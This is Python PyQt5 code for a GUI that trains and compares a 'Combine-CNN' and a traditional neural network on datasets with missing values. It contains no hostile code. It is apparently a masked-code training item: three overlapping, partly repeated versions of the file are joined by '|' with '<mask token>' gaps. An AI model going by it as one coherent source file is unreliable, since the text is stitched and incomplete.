self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet('QWidget { background-color: %s }' % col
.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.
setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.
setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'traditional NN设置缺失参数', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',
self, 'New')
elif self.sender() is self.dataShowButtonT:
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'
, self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)
return
<mask token>
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
self.trainingWT.show()
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1
] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误',
'卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)
return
if combineNumCalculate.combineNumCal(self.dataFor[senderName].
DataTrainX.shape[1], self.combineNumConv
) < self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误',
'池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示',
'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示',
'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'
, self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
self.mcbcnn = myCombineCNN.myCombineCNN(None, self.
combineNumConv, self.convCoreNum, self.
combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'New'))
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'Tra'))
<mask token>
| <mask token>
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.0
self.dataSetLossValue['New'] = 0.0
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.0
self.dataSetLossValue['Tra'] = 0.0
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet('QWidget { background-color: %s }' % col
.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.
setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.
setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'traditional NN设置缺失参数', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',
self, 'New')
elif self.sender() is self.dataShowButtonT:
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'
, self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)
return
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
self.setModelParaW = (setModelParametersDialog.
setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))
elif self.sender() is self.setModelParametersButtonT:
self.setModelParaW = (setModelParametersDialog.
setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
self.trainingWT.show()
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1
] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误',
'卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)
return
if combineNumCalculate.combineNumCal(self.dataFor[senderName].
DataTrainX.shape[1], self.combineNumConv
) < self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误',
'池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示',
'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示',
'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'
, self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
self.mcbcnn = myCombineCNN.myCombineCNN(None, self.
combineNumConv, self.convCoreNum, self.
combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'New'))
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'Tra'))
<mask token>
| import sys
from PyQt5.QtWidgets import QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame, QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QColor
import myLoadData
from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget, showJudgeWidgets, chooseJudgeDataSetWidget
from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.0
self.dataSetLossValue['New'] = 0.0
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.0
self.dataSetLossValue['Tra'] = 0.0
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
